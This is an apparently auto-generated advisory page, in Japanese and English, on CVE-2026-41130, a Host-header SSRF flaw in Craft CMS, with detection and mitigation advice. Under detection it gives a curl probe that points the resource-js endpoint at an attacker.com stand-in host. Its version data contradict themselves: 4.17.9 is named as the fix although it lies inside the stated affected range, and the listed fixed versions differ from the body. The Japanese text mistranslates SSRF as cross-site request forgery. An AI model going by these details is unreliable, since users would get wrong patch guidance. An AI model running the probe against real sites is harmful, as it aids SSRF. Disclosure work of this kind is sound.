プラットフォーム
php
コンポーネント
craftcms
修正版
5.0.1
4.0.1
5.9.15
CVE-2026-41130 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in Craft CMS. This flaw allows unauthenticated attackers to proxy remote JavaScript resources by manipulating the Host header. The vulnerability impacts versions 4.0.0-RC1 through 5.9.14, and a fix is available in version 4.17.9.
The SSRF vulnerability in Craft CMS arises from the application's trust of the client-supplied Host header when determining the baseUrl used in prefix validation within the actionResourceJs() function. Without explicit restrictions on trustedHosts, an attacker can craft a malicious Host header, effectively controlling the HTTP requests made by the server. This enables the attacker to initiate arbitrary HTTP requests to internal or external resources, potentially exposing sensitive data or interacting with internal services that should not be directly accessible from the internet. The impact is amplified if the server has access to sensitive internal resources or APIs.
CVE-2026-41130 was publicly disclosed on 2026-04-21. There is no indication of active exploitation campaigns at this time. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is not yet widely available, but the vulnerability's nature makes it likely that such code will emerge.
Craft CMS installations running versions 4.0.0-RC1 through 5.9.14 are at risk. This includes deployments using the default configuration where trustedHosts is not explicitly restricted. Shared hosting environments running Craft CMS are particularly vulnerable due to the potential for cross-tenant exploitation.
• php / server:
grep -r 'actionResourceJs()' /path/to/craft-cms/app/controllers/AppController.php• generic web:
curl -I https://your-craft-cms-site.com/resource-js?resource=https://attacker.comExamine the response headers for unexpected Content-Security-Policy directives or other anomalies.
• generic web:
Review Craft CMS access and error logs for requests to unusual or unexpected domains via the resource-js endpoint.
disclosure
エクスプロイト状況
EPSS
0.05% (14% パーセンタイル)
CISA SSVC
The primary mitigation for CVE-2026-41130 is to upgrade Craft CMS to version 4.17.9 or later. Prior to upgrading, carefully review the release notes for any breaking changes that might impact your application's functionality. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains. This limits the server's ability to proxy requests to unauthorized locations. Monitor server logs for unusual outbound HTTP requests originating from the resource-js endpoint. Consider implementing a Web Application Firewall (WAF) with rules to block requests with suspicious Host headers.
Craft CMS をバージョン 4.17.9 以降、またはバージョン 5.9.15 以降にアップデートしてください。このアップデートは、クライアントが提供する Host ヘッダーへの信頼を制限することで、サイト間リクエスト偽装 (SSRF) 攻撃を可能にする Host ヘッダーインジェクションの脆弱性を修正します。
脆弱性分析と重要アラートをメールでお届けします。
CVE-2026-41130 is a Server-Side Request Forgery (SSRF) vulnerability in Craft CMS that allows attackers to proxy remote JavaScript resources by manipulating the Host header.
You are affected if you are running Craft CMS versions 4.0.0-RC1 through 5.9.14 and have not explicitly restricted the trustedHosts configuration.
Upgrade Craft CMS to version 4.17.9 or later. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains.
There is currently no indication of active exploitation campaigns, but the vulnerability's nature makes it likely that exploitation will occur.
Refer to the official Craft CMS security advisory for detailed information and updates: [https://craftcms.com/security/advisories](https://craftcms.com/security/advisories)